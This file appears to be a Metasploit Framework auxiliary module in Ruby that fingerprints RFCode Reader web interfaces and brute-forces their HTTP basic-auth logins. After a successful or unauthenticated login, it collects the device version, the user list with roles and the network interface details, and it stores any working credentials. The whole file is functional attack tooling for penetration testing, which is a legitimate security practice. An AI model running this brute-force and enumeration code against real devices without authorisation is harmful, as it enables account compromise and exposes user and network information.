metasploit-framework/modules/auxiliary/scanner/http/rfcode_reader_enum.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'RFCode Reader Web Interface Login / Bruteforce Utility',
      'Description'    => %{
        This module simply attempts to login to a RFCode Reader web interface.
        Please note that by default there is no authentication. In such a case, password brute force will not be performed.
        If there is authentication configured, the module will attempt to find valid login credentials and capture device information.
      },
      'Author'         =>
        [
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
        ],
      'License'	 => MSF_LICENSE

    ))

    register_options(
      [
        OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", true])
      ])

  end

  #
  # Info-Only
  # Identify logged in user: /rfcode_reader/api/whoami.json
  # Capture list of users: /rfcode_reader/api/userlist.json
  # Interface configuration: /rfcode_reader/api/interfacestatus.json
  # Device platform details: /rfcode_reader/api/version.json
  #

  def run_host(ip)
    unless is_app_rfreader?
      print_error("#{rhost}:#{rport} - Application does not appear to be RFCode Reader. Module will not continue.")
      return
    end

    print_status("#{rhost}:#{rport} - Checking if authentication is required...")
    unless is_auth_required?
      print_warning("#{rhost}:#{rport} - Application does not require authentication.")
      user = ''
      pass = ''

      # Collect device platform & configuration info
      collect_info(user, pass)
      return
    end

    print_status("#{rhost}:#{rport} - Brute-forcing...")
    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  end

  #
  # What's the point of running this module if the app actually isn't RFCode Reader?
  #
  def is_app_rfreader?
    res = send_request_cgi(
      {
        'uri' => '/rfcode_reader/api/whoami.json',
        'vars_get' =>
          {
            '_dc' => '1369680704481'
          }
      })
    return (res and res.code != 404)
  end

  #
  # The default install of RFCode Reader app does not require authentication. Instead, it'll log the
  # user right in. If that's the case, no point to brute-force, either.
  #
  def is_auth_required?
    user = ''
    pass = ''

    res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/whoami.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'	=>
          {
            '_dc' => '1369680704481'
          }
      })

    return (res and res.body =~ /{  }/) ? false : true
  end

  #
  # Brute-force the login page
  #
  def do_login(user, pass)

    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
    begin
      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/whoami.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'	=>
          {
            '_dc' => '1369680704481'
          }
      })

      if not res or res.code == 401
        vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
      else
        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")

        collect_info(user, pass)

        report_cred(
          ip: rhost,
          port: rport,
          service_name: 'RFCode Reader',
          user: user,
          password: pass,
          proof: res.code.to_s
        )
        return :next_user
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
      return :abort
    end
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  #
  # Collect target info
  #
  def collect_info(user, pass)

    vprint_status("#{rhost}:#{rport} - Collecting information from app as #{user.inspect}:#{pass.inspect}...")
    begin

      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/version.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'      =>
          {
            '_dc' => '1370460180056'
          }
      })

      if res and res.body
        release_ver = JSON.parse(res.body)["release"]
        product_name = JSON.parse(res.body)["product"]

        vprint_status("#{rhost}:#{rport} - Collecting device platform info...")
        vprint_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'")

        report_note(
          :host   => rhost,
          :proto  => 'tcp',
          :port   => rport,
          :sname  => "RFCode Reader",
          :data   => "Release Version: #{release_ver}, Product: #{product_name}",
          :type	=> 'Info'
        )
      end

      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/userlist.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'      =>
          {
            '_dc' => '1370353972710'
          }
      })

      if res and res.body
        userlist = JSON.parse(res.body)
        vprint_status("#{rhost}:#{rport} - Collecting user list...")
        vprint_good("#{rhost}:#{rport} - User list & role: #{userlist}")

        report_note(
          :host   => rhost,
          :proto  => 'tcp',
          :port   => rport,
          :sname	=> "RFCode Reader",
          :data   => "User List & Roles: #{userlist}",
          :type	=> 'Info'
        )
      end

      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/interfacestatus.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'      =>
          {
            '_dc' => '1369678668067'
          }
      })

      if res and res.body
        eth0_info = JSON.parse(res.body)["eth0"]
        vprint_status("#{rhost}:#{rport} - Collecting interface info...")
        vprint_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}")

        report_note(
          :host	=> rhost,
          :proto	=> 'tcp',
          :port	=> rport,
          :sname	=> "RFCode Reader",
          :data	=> "Interface eth0: #{eth0_info}",
          :type	=> 'Info'
        )
      end

      return
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed while collecting info")
      return
    rescue JSON::ParserError
      vprint_error("#{rhost}:#{rport} - Unable to parse JSON response while collecting info")
      return
    end
  end
end